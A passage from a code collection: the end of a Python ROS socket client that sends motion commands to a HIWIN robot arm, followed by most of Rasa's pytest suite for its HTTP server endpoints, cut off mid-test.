data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 5 ##切換初始mode狀態
Socket.send(data.encode('utf-8'))#socket傳送for python to translate str
# Socket_sent_flag = True
# socket_client_sent_flag(Socket_sent_flag)
##-----------socket client--------
def socket_client():
global Socket,Arm_feedback,data,Socket_sent_flag
try:
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(Socket.recv(1024))
while 1:
feedback_str = Socket.recv(1024)
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '48':# F 手臂為Ready狀態準備接收下一個運動指令
state_feedback.ArmState = False
# Arm_feedback = 0
# socket_client_arm_state(Arm_feedback)
#print("isbusy false")
if str(feedback_str[2]) == '49':# T 手臂為忙碌狀態無法執行下一個運動指令
state_feedback.ArmState = True
# Arm_feedback = 1
# socket_client_arm_state(Arm_feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6 策略完成
state_feedback.ArmState = 6
# Arm_feedback = 6
# socket_client_arm_state(Arm_feedback)
print("shutdown")
#確認傳送旗標
if str(feedback_str[4]) == '48':#回傳0 false
state_feedback.SentFlag = False
# Socket_sent_flag = False
# socket_client_sent_flag(Socket_sent_flag)
if str(feedback_str[4]) == '49':#回傳1 true
state_feedback.SentFlag = True
# Socket_sent_flag = True
# socket_client_sent_flag(Socket_sent_flag)
##---------------socket 傳輸手臂命令 end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
break
rospy.on_shutdown(myhook)
Socket.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_test():
socket_client()
## 多執行序 end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5##切換初始mode狀態
t = threading.Thread(target=thread_test)
t.start() # 開啟多執行緒
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
|
test_server.py
|
import asyncio
import json
import os
import time
import urllib.parse
import uuid
import sys
from http import HTTPStatus
from multiprocessing import Process, Manager
from multiprocessing.managers import DictProxy
from pathlib import Path
from typing import List, Text, Type, Generator, NoReturn, Dict, Optional
from unittest.mock import Mock, ANY
from _pytest.tmpdir import TempPathFactory
import pytest
import requests
from _pytest import pathlib
from _pytest.monkeypatch import MonkeyPatch
from aioresponses import aioresponses
from freezegun import freeze_time
from unittest.mock import MagicMock
from ruamel.yaml import StringIO
from sanic import Sanic
from sanic_testing.testing import SanicASGITestClient
import rasa
import rasa.constants
import rasa.core.jobs
from rasa.engine.storage.local_model_storage import LocalModelStorage
import rasa.nlu
import rasa.server
import rasa.shared.constants
import rasa.shared.utils.io
import rasa.utils.io
from rasa.core import utils
from rasa.core.agent import Agent, load_agent
from rasa.core.channels import (
channel,
CollectingOutputChannel,
RestInput,
SlackInput,
CallbackInput,
)
from rasa.core.channels.slack import SlackBot
from rasa.core.tracker_store import InMemoryTrackerStore
import rasa.nlu.test
from rasa.nlu.test import CVEvaluationResult
from rasa.shared.core import events
from rasa.shared.core.constants import (
ACTION_SESSION_START_NAME,
ACTION_LISTEN_NAME,
REQUESTED_SLOT,
SESSION_START_METADATA_SLOT,
)
from rasa.shared.core.domain import Domain, SessionConfig
from rasa.shared.core.events import (
Event,
UserUttered,
SlotSet,
BotUttered,
ActionExecuted,
SessionStarted,
)
from rasa.shared.core.trackers import DialogueStateTracker
from rasa.shared.nlu.constants import INTENT_NAME_KEY
from rasa.model_training import TrainingResult
from rasa.utils.endpoints import EndpointConfig
from tests.conftest import AsyncMock, with_model_id, with_model_ids
from tests.nlu.utilities import ResponseTest
from tests.utilities import json_of_latest_request, latest_request
# a couple of event instances that we can use for testing
test_events = [
Event.from_parameters(
{
"event": UserUttered.type_name,
"text": "/goodbye",
"parse_data": {
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"entities": [],
},
}
),
BotUttered("Welcome!", {"test": True}),
SlotSet("cuisine", 34),
SlotSet("cuisine", "34"),
SlotSet("location", None),
SlotSet("location", [34, "34", None]),
]
# sequence of events expected at the beginning of trackers
session_start_sequence: List[Event] = [
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
ActionExecuted(ACTION_LISTEN_NAME),
]
@pytest.fixture
def rasa_app_without_api(rasa_server_without_api: Sanic) -> SanicASGITestClient:
return rasa_server_without_api.asgi_client
@pytest.fixture
def rasa_app(rasa_server: Sanic) -> SanicASGITestClient:
return rasa_server.asgi_client
@pytest.fixture
def rasa_non_trained_app(rasa_non_trained_server: Sanic) -> SanicASGITestClient:
return rasa_non_trained_server.asgi_client
@pytest.fixture
def rasa_app_nlu(rasa_nlu_server: Sanic) -> SanicASGITestClient:
return rasa_nlu_server.asgi_client
@pytest.fixture
def rasa_app_core(rasa_core_server: Sanic) -> SanicASGITestClient:
return rasa_core_server.asgi_client
@pytest.fixture
def rasa_secured_app(rasa_server_secured: Sanic) -> SanicASGITestClient:
return rasa_server_secured.asgi_client
@pytest.fixture
def rasa_non_trained_secured_app(
rasa_non_trained_server_secured: Sanic,
) -> SanicASGITestClient:
return rasa_non_trained_server_secured.asgi_client
@pytest.fixture()
async def tear_down_scheduler() -> Generator[None, None, None]:
yield None
rasa.core.jobs.__scheduler = None
async def test_root(rasa_non_trained_app: SanicASGITestClient):
_, response = await rasa_non_trained_app.get("/")
assert response.status == HTTPStatus.OK
assert response.text.startswith("Hello from Rasa:")
async def test_root_without_enable_api(rasa_app_without_api: SanicASGITestClient):
_, response = await rasa_app_without_api.get("/")
assert response.status == HTTPStatus.OK
assert response.text.startswith("Hello from Rasa:")
async def test_root_secured(rasa_non_trained_secured_app: SanicASGITestClient):
_, response = await rasa_non_trained_secured_app.get("/")
assert response.status == HTTPStatus.OK
assert response.text.startswith("Hello from Rasa:")
async def test_version(rasa_non_trained_app: SanicASGITestClient):
_, response = await rasa_non_trained_app.get("/version")
content = response.json
assert response.status == HTTPStatus.OK
assert content.get("version") == rasa.__version__
assert (
content.get("minimum_compatible_version")
== rasa.constants.MINIMUM_COMPATIBLE_VERSION
)
async def test_status(rasa_app: SanicASGITestClient, trained_rasa_model: Text):
_, response = await rasa_app.get("/status")
model_file = response.json["model_file"]
assert response.status == HTTPStatus.OK
assert "fingerprint" in response.json
assert model_file == Path(trained_rasa_model).name
async def test_status_nlu_only(
rasa_app_nlu: SanicASGITestClient, trained_nlu_model: Text
):
_, response = await rasa_app_nlu.get("/status")
model_file = response.json["model_file"]
assert response.status == HTTPStatus.OK
assert "fingerprint" in response.json
assert "model_file" in response.json
assert model_file == Path(trained_nlu_model).name
async def test_status_secured(rasa_secured_app: SanicASGITestClient):
_, response = await rasa_secured_app.get("/status")
assert response.status == HTTPStatus.UNAUTHORIZED
async def test_status_not_ready_agent(rasa_app: SanicASGITestClient):
rasa_app.sanic_app.agent = None
_, response = await rasa_app.get("/status")
assert response.status == HTTPStatus.CONFLICT
@pytest.fixture
def shared_statuses() -> DictProxy:
return Manager().dict()
@pytest.fixture
def background_server(
shared_statuses: DictProxy, tmpdir: pathlib.Path, monkeypatch: MonkeyPatch
) -> Generator[Process, None, None]:
# Create a fake model archive which the mocked train function can return
fake_model = Path(tmpdir) / "fake_model.tar.gz"
fake_model.touch()
fake_model_path = str(fake_model)
# Fake training function which blocks until we tell it to stop blocking
# If we can send a status request while this is blocking, we can be sure that the
# actual training is also not blocking
def mocked_training_function(*_, **__) -> TrainingResult:
# Tell the others that we are now blocking
shared_statuses["started_training"] = True
# Block until somebody tells us to not block anymore
while shared_statuses.get("stop_training") is not True:
time.sleep(1)
return TrainingResult(model=fake_model_path)
def run_server(monkeypatch: MonkeyPatch) -> NoReturn:
import sys
monkeypatch.setattr(
sys.modules["rasa.model_training"], "train", mocked_training_function,
)
from rasa import __main__
sys.argv = ["rasa", "run", "--enable-api"]
__main__.main()
server = Process(target=run_server, args=(monkeypatch,))
yield server
server.terminate()
@pytest.fixture()
def training_request(
shared_statuses: DictProxy, tmp_path: Path
) -> Generator[Process, None, None]:
def send_request() -> None:
payload = {}
project_path = Path("examples") / "formbot"
for file in [
"domain.yml",
"config.yml",
Path("data") / "rules.yml",
Path("data") / "stories.yml",
Path("data") / "nlu.yml",
]:
full_path = project_path / file
# Read in as dictionaries to avoid that keys, which are specified in
# multiple files (such as 'version'), clash.
content = rasa.shared.utils.io.read_yaml_file(full_path)
payload.update(content)
concatenated_payload_file = tmp_path / "concatenated.yml"
rasa.shared.utils.io.write_yaml(payload, concatenated_payload_file)
payload_as_yaml = concatenated_payload_file.read_text()
response = requests.post(
"http://localhost:5005/model/train",
data=payload_as_yaml,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
params={"force_training": True},
)
shared_statuses["training_result"] = response.status_code
train_request = Process(target=send_request)
yield train_request
train_request.terminate()
# Due to unknown reasons this test can not be run in pycharm, it
# results in segfaults...will skip in that case - test will still get run on CI.
# It also doesn't run on Windows because of Process-related calls and an attempt
# to start/terminate a process. We will investigate this case further later:
# https://github.com/RasaHQ/rasa/issues/6302
@pytest.mark.skipif("PYCHARM_HOSTED" in os.environ, reason="results in segfault")
@pytest.mark.skip_on_windows
def test_train_status_is_not_blocked_by_training(
background_server: Process, shared_statuses: DictProxy, training_request: Process
):
background_server.start()
def is_server_ready() -> bool:
try:
return (
requests.get("http://localhost:5005/status").status_code
== HTTPStatus.OK
)
except Exception:
return False
# wait until server is up before sending train request and status test loop
start = time.time()
while not is_server_ready() and time.time() - start < 60:
time.sleep(1)
assert is_server_ready()
training_request.start()
# Wait until the blocking training function was called
start = time.time()
while (
shared_statuses.get("started_training") is not True and time.time() - start < 60
):
time.sleep(1)
# Check if the number of currently running trainings was incremented
response = requests.get("http://localhost:5005/status")
assert response.status_code == HTTPStatus.OK
assert response.json()["num_active_training_jobs"] == 1
# Tell the blocking training function to stop
shared_statuses["stop_training"] = True
start = time.time()
while shared_statuses.get("training_result") is None and time.time() - start < 60:
time.sleep(1)
assert shared_statuses.get("training_result")
# Check that the training worked correctly
assert shared_statuses["training_result"] == HTTPStatus.OK
# Check if the number of currently running trainings was decremented
response = requests.get("http://localhost:5005/status")
assert response.status_code == HTTPStatus.OK
assert response.json()["num_active_training_jobs"] == 0
@pytest.mark.parametrize(
"response_test",
[
ResponseTest(
"/model/parse",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello ńöñàśçií",
},
payload={"text": "hello ńöñàśçií"},
),
],
)
async def test_parse(rasa_app: SanicASGITestClient, response_test: ResponseTest):
_, response = await rasa_app.post(
response_test.endpoint, json=response_test.payload
)
rjs = response.json
assert response.status == HTTPStatus.OK
assert all(prop in rjs for prop in ["entities", "intent", "text"])
assert rjs["entities"] == response_test.expected_response["entities"]
assert rjs["text"] == response_test.expected_response["text"]
assert rjs["intent"] == response_test.expected_response["intent"]
@pytest.mark.parametrize(
"response_test",
[
ResponseTest(
"/model/parse?emulation_mode=wit",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse?emulation_mode=dialogflow",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse?emulation_mode=luis",
{
"entities": [],
"intent": {"confidence": 1.0, INTENT_NAME_KEY: "greet"},
"text": "hello ńöñàśçií",
},
payload={"text": "hello ńöñàśçií"},
),
],
)
async def test_parse_with_different_emulation_mode(
rasa_app: SanicASGITestClient, response_test: ResponseTest
):
_, response = await rasa_app.post(
response_test.endpoint, json=response_test.payload
)
assert response.status == HTTPStatus.OK
async def test_parse_without_nlu_model(rasa_app_core: SanicASGITestClient):
_, response = await rasa_app_core.post("/model/parse", json={"text": "hello"})
assert response.status == HTTPStatus.OK
rjs = response.json
assert all(prop in rjs for prop in ["entities", "intent", "text"])
async def test_parse_on_invalid_emulation_mode(rasa_app: SanicASGITestClient,):
_, response = await rasa_app.post(
"/model/parse?emulation_mode=ANYTHING", json={"text": "hello"}
)
assert response.status == HTTPStatus.BAD_REQUEST
async def test_train_nlu_success(
rasa_app: SanicASGITestClient,
stack_config_path: Text,
nlu_data_path: Text,
domain_path: Text,
tmp_path_factory: TempPathFactory,
):
domain_data = rasa.shared.utils.io.read_yaml_file(domain_path)
config_data = rasa.shared.utils.io.read_yaml_file(stack_config_path)
nlu_data = rasa.shared.utils.io.read_yaml_file(nlu_data_path)
# combine all data into our payload
payload = {
key: val for d in [domain_data, config_data, nlu_data] for key, val in d.items()
}
data = StringIO()
rasa.shared.utils.io.write_yaml(payload, data)
_, response = await rasa_app.post(
"/model/train",
data=data.getvalue(),
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
# save model to temporary file
model_path = str(Path(tmp_path_factory.mktemp("model_dir")) / "model.tar.gz")
with open(model_path, "wb") as f:
f.write(response.body)
storage_path = tmp_path_factory.mktemp("storage_path")
model_storage, model_metadata = LocalModelStorage.from_model_archive(
storage_path, model_path
)
assert model_metadata.model_id
async def test_train_core_success_with(
rasa_app: SanicASGITestClient,
stack_config_path: Text,
stories_path: Text,
domain_path: Text,
tmp_path_factory: TempPathFactory,
):
payload = f"""
{Path(domain_path).read_text()}
{Path(stack_config_path).read_text()}
{Path(stories_path).read_text()}
"""
_, response = await rasa_app.post(
"/model/train",
data=payload,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
# save model to temporary file
model_path = str(Path(tmp_path_factory.mktemp("model_dir")) / "model.tar.gz")
with open(model_path, "wb") as f:
f.write(response.body)
storage_path = tmp_path_factory.mktemp("storage_path")
model_storage, model_metadata = LocalModelStorage.from_model_archive(
storage_path, model_path
)
assert model_metadata.model_id
async def test_train_with_retrieval_events_success(
rasa_app: SanicASGITestClient,
stack_config_path: Text,
tmp_path_factory: TempPathFactory,
):
payload = {}
tmp_path = tmp_path_factory.mktemp("tmp")
for file in [
"data/test_domains/default_retrieval_intents.yml",
stack_config_path,
"data/test_yaml_stories/stories_retrieval_intents.yml",
"data/test_responses/default.yml",
"data/test/stories_default_retrieval_intents.yml",
]:
# Read in as dictionaries to avoid that keys, which are specified in
# multiple files (such as 'version'), clash.
content = rasa.shared.utils.io.read_yaml_file(file)
payload.update(content)
concatenated_payload_file = tmp_path / "concatenated.yml"
rasa.shared.utils.io.write_yaml(payload, concatenated_payload_file)
payload_as_yaml = concatenated_payload_file.read_text()
# it usually takes a bit longer on windows so we're going to double the timeout
timeout = 60 * 10 if sys.platform == "win32" else 60 * 5
_, response = await rasa_app.post(
"/model/train",
data=payload_as_yaml,
timeout=timeout,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
assert_trained_model(response.body, tmp_path_factory)
def assert_trained_model(
response_body: bytes, tmp_path_factory: TempPathFactory,
) -> None:
# save model to temporary file
model_path = str(Path(tmp_path_factory.mktemp("model_dir")) / "model.tar.gz")
with open(model_path, "wb") as f:
f.write(response_body)
storage_path = tmp_path_factory.mktemp("storage_path")
model_storage, model_metadata = LocalModelStorage.from_model_archive(
storage_path, model_path
)
assert model_metadata.model_id
async def test_train_with_yaml(
rasa_app: SanicASGITestClient, tmp_path_factory: TempPathFactory,
):
training_data = """
version: "2.0"
stories:
- story: My story
steps:
- intent: greet
- action: utter_greet
rules:
- rule: My rule
steps:
- intent: greet
- action: utter_greet
intents:
- greet
nlu:
- intent: greet
examples: |
- hi
- hello
responses:
utter_greet:
- text: Hi
recipe: default.v1
language: en
policies:
- name: RulePolicy
pipeline:
- name: KeywordIntentClassifier
"""
_, response = await rasa_app.post(
"/model/train",
data=training_data,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
assert_trained_model(response.body, tmp_path_factory)
@pytest.mark.parametrize(
"params", [{}, {"augmentation": 20, "num_threads": 2, "force_training": True}]
)
async def test_train_with_yaml_with_params(
monkeypatch: MonkeyPatch,
rasa_non_trained_app: SanicASGITestClient,
tmp_path: Path,
params: Dict,
):
fake_model = Path(tmp_path) / "fake_model.tar.gz"
fake_model.touch()
fake_model_path = str(fake_model)
mock_train = Mock(return_value=TrainingResult(model=fake_model_path))
monkeypatch.setattr(rasa.model_training, "train", mock_train)
training_data = """
stories: []
rules: []
intents: []
nlu: []
responses: {}
recipe: default.v1
language: en
policies: []
pipeline: []
"""
_, response = await rasa_non_trained_app.post(
"/model/train",
data=training_data,
params=params,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
assert mock_train.call_count == 1
args, kwargs = mock_train.call_args_list[0]
assert kwargs["core_additional_arguments"]["augmentation_factor"] == params.get(
"augmentation", 50
)
assert kwargs["nlu_additional_arguments"]["num_threads"] == params.get(
"num_threads", 1
)
assert kwargs["force_training"] == params.get("force_training", False)
async def test_train_with_invalid_yaml(rasa_non_trained_app: SanicASGITestClient):
invalid_yaml = """
rules:
rule my rule
"""
_, response = await rasa_non_trained_app.post(
"/model/train",
data=invalid_yaml,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.BAD_REQUEST
@pytest.mark.parametrize(
"headers, expected",
[({}, False), ({"force_training": False}, False), ({"force_training": True}, True)],
)
def test_training_payload_from_yaml_force_training(
headers: Dict, expected: bool, tmp_path: Path
):
request = Mock()
request.body = b""
request.args = headers
payload = rasa.server._training_payload_from_yaml(request, tmp_path)
assert payload.get("force_training") == expected
@pytest.mark.parametrize(
"headers, expected",
[
({}, rasa.shared.constants.DEFAULT_MODELS_PATH),
({"save_to_default_model_directory": False}, ANY),
(
{"save_to_default_model_directory": True},
rasa.shared.constants.DEFAULT_MODELS_PATH,
),
],
)
def test_training_payload_from_yaml_save_to_default_model_directory(
headers: Dict, expected: Text, tmp_path: Path
):
request = Mock()
request.body = b""
request.args = headers
payload = rasa.server._training_payload_from_yaml(request, tmp_path)
assert payload.get("output")
assert payload.get("output") == expected
async def xtest_evaluate_stories(rasa_app: SanicASGITestClient, stories_path: Text):
stories = rasa.shared.utils.io.read_file(stories_path)
_, response = await rasa_app.post(
"/model/test/stories",
data=stories,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
js = response.json
assert set(js.keys()) == {
"report",
"precision",
"f1",
"accuracy",
"actions",
"in_training_data_fraction",
"is_end_to_end_evaluation",
}
assert not js["is_end_to_end_evaluation"]
assert set(js["actions"][0].keys()) == {
"action",
"predicted",
"confidence",
"policy",
}
async def test_evaluate_stories_not_ready_agent(
rasa_non_trained_app: SanicASGITestClient, stories_path: Text
):
stories = rasa.shared.utils.io.read_file(stories_path)
_, response = await rasa_non_trained_app.post("/model/test/stories", data=stories)
assert response.status == HTTPStatus.CONFLICT
async def test_evaluate_stories_end_to_end(
rasa_app: SanicASGITestClient, end_to_end_story_path: Text
):
stories = rasa.shared.utils.io.read_file(end_to_end_story_path)
_, response = await rasa_app.post(
"/model/test/stories?e2e=true",
data=stories,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
js = response.json
assert set(js.keys()) == {
"report",
"precision",
"f1",
"accuracy",
"actions",
"in_training_data_fraction",
"is_end_to_end_evaluation",
}
assert js["is_end_to_end_evaluation"]
assert js["actions"] != []
assert set(js["actions"][0].keys()) == {
"action",
"predicted",
"confidence",
"policy",
}
async def test_evaluate_intent(rasa_app: SanicASGITestClient, nlu_data_path: Text):
nlu_data = rasa.shared.utils.io.read_file(nlu_data_path)
_, response = await rasa_app.post(
"/model/test/intents",
data=nlu_data,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
assert set(response.json.keys()) == {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}
async def test_evaluate_invalid_intent_model_file(rasa_app: SanicASGITestClient):
_, response = await rasa_app.post(
"/model/test/intents?model=invalid.tar.gz",
json={},
headers={"Content-type": rasa.server.JSON_CONTENT_TYPE},
)
assert response.status == HTTPStatus.INTERNAL_SERVER_ERROR
async def test_evaluate_intent_without_body(rasa_app: SanicASGITestClient):
_, response = await rasa_app.post(
"/model/test/intents", headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.BAD_REQUEST
async def test_evaluate_intent_on_just_nlu_model(
rasa_app_nlu: SanicASGITestClient, nlu_data_path: Text
):
nlu_data = rasa.shared.utils.io.read_file(nlu_data_path)
_, response = await rasa_app_nlu.post(
"/model/test/intents",
data=nlu_data,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
assert set(response.json.keys()) == {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}
async def test_evaluate_intent_with_model_param(
rasa_app: SanicASGITestClient, trained_nlu_model: Text, nlu_data_path: Text
):
_, response = await rasa_app.get("/status")
previous_model_file = response.json["model_file"]
nlu_data = rasa.shared.utils.io.read_file(nlu_data_path)
_, response = await rasa_app.post(
f"/model/test/intents?model={trained_nlu_model}",
data=nlu_data,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
assert set(response.json.keys()) == {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}
_, response = await rasa_app.get("/status")
assert previous_model_file == response.json["model_file"]
async def test_evaluate_intent_with_model_server(
rasa_app: SanicASGITestClient,
trained_rasa_model: Text,
nlu_data_path: Text,
tear_down_scheduler: None,
):
production_model_server_url = (
"https://example.com/webhooks/actions?model=production"
)
test_model_server_url = "https://example.com/webhooks/actions?model=test"
nlu_data = rasa.shared.utils.io.read_file(nlu_data_path)
with aioresponses() as mocked:
# Mock retrieving the production model from the model server
mocked.get(
production_model_server_url,
body=Path(trained_rasa_model).read_bytes(),
headers={"ETag": "production", "filename": "prod_model.tar.gz"},
)
# Mock retrieving the test model from the model server
mocked.get(
test_model_server_url,
body=Path(trained_rasa_model).read_bytes(),
headers={"ETag": "test", "filename": "test_model.tar.gz"},
)
agent_with_model_server = await load_agent(
model_server=EndpointConfig(production_model_server_url)
)
rasa_app.sanic_app.agent = agent_with_model_server
_, response = await rasa_app.post(
f"/model/test/intents?model={test_model_server_url}",
data=nlu_data,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
assert set(response.json.keys()) == {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}
production_model_server = rasa_app.sanic_app.agent.model_server
# Assert that the model server URL for the test didn't override the production
# model server URL
assert production_model_server.url == production_model_server_url
# Assert the tests didn't break pulling the models
assert production_model_server.kwargs.get("wait_time_between_pulls") != 0
async def test_cross_validation(
rasa_non_trained_app: SanicASGITestClient,
nlu_data_path: Text,
stack_config_path: Text,
):
nlu_data = Path(nlu_data_path).read_text()
config = Path(stack_config_path).read_text()
payload = f"{nlu_data}\n{config}"
_, response = await rasa_non_trained_app.post(
"/model/test/intents",
data=payload,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
params={"cross_validation_folds": 3},
)
assert response.status == HTTPStatus.OK
response_body = response.json
for required_key in {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}:
assert required_key in response_body
details = response_body[required_key]
assert all(
key in details for key in ["precision", "f1_score", "report", "errors"]
)
async def test_cross_validation_with_callback_success(
rasa_non_trained_app: SanicASGITestClient,
nlu_data_path: Text,
monkeypatch: MonkeyPatch,
stack_config_path: Text,
):
nlu_data = Path(nlu_data_path).read_text()
config = Path(stack_config_path).read_text()
payload = f"{nlu_data}\n{config}"
callback_url = "https://example.com/webhooks/actions"
with aioresponses() as mocked:
mocked.post(callback_url, payload={})
mocked_cross_validation = AsyncMock(
return_value=(
CVEvaluationResult({}, {}, {}),
CVEvaluationResult({}, {}, {}),
CVEvaluationResult({}, {}, {}),
)
)
monkeypatch.setattr(
rasa.nlu.test,
rasa.nlu.test.cross_validate.__name__,
mocked_cross_validation,
)
_, response = await rasa_non_trained_app.post(
"/model/test/intents",
data=payload,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
params={"cross_validation_folds": 3, "callback_url": callback_url},
)
assert response.status == HTTPStatus.NO_CONTENT
# Sleep to give event loop time to process things in the background
await asyncio.sleep(1)
mocked_cross_validation.assert_called_once()
last_request = latest_request(mocked, "POST", callback_url)
assert last_request
content = last_request[0].kwargs["data"]
response_body = json.loads(content)
for required_key in {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}:
assert required_key in response_body
details = response_body[required_key]
assert all(
key in details for key in ["precision", "f1_score", "report", "errors"]
)
async def test_cross_validation_with_callback_error(
rasa_non_trained_app: SanicASGITestClient,
nlu_data_path: Text,
monkeypatch: MonkeyPatch,
stack_config_path: Text,
):
nlu_data = Path(nlu_data_path).read_text()
config = Path(stack_config_path).read_text()
payload = f"{nlu_data}\n{config}"
monkeypatch.setattr(
rasa.nlu.test,
rasa.nlu.test.cross_validate.__name__,
Mock(side_effect=ValueError()),
)
callback_url = "https://example.com/webhooks/actions"
with aioresponses() as mocked:
mocked.post(callback_url, payload={})
_, response = await rasa_non_trained_app.post(
"/model/test/intents",
data=payload,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
params={"cross_validation_folds": 3, "callback_url": callback_url},
)
assert response.status == HTTPStatus.NO_CONTENT
await asyncio.sleep(1)
last_request = latest_request(mocked, "POST", callback_url)
assert last_request
content = last_request[0].kwargs["json"]
assert content["code"] == HTTPStatus.INTERNAL_SERVER_ERROR
async def test_callback_unexpected_error(
rasa_non_trained_app: SanicASGITestClient,
nlu_data_path: Text,
monkeypatch: MonkeyPatch,
stack_config_path: Text,
):
nlu_data = Path(nlu_data_path).read_text()
config = Path(stack_config_path).read_text()
payload = f"{nlu_data}\n{config}"
async def raiseUnexpectedError() -> NoReturn:
raise ValueError()
monkeypatch.setattr(
rasa.server,
rasa.server._training_payload_from_yaml.__name__,
Mock(side_effect=ValueError()),
)
callback_url = "https://example.com/webhooks/actions"
with aioresponses() as mocked:
mocked.post(callback_url, payload={})
_, response = await rasa_non_trained_app.post(
"/model/test/intents",
data=payload,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
params={"cross_validation_folds": 3, "callback_url": callback_url},
)
assert response.status == HTTPStatus.NO_CONTENT
await asyncio.sleep(1)
last_request = latest_request(mocked, "POST", callback_url)
assert last_request
content = last_request[0].kwargs["json"]
assert content["code"] == HTTPStatus.INTERNAL_SERVER_ERROR
async def test_predict(rasa_app: SanicASGITestClient):
data = [
{"event": "action", "name": "action_listen"},
{
"event": "user",
"text": "hello",
"parse_data": {
"entities": [],
"intent": {"confidence": 0.57, INTENT_NAME_KEY: "greet"},
"text": "hello",
},
},
]
_, response = await rasa_app.post(
"/model/predict",
json=data,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
content = response.json
assert response.status == HTTPStatus.OK
assert "scores" in content
assert "tracker" in content
assert "policy" in content
async def test_predict_invalid_entities_format(rasa_app: SanicASGITestClient):
data = [
{"event": "action", "name": "action_listen"},
{
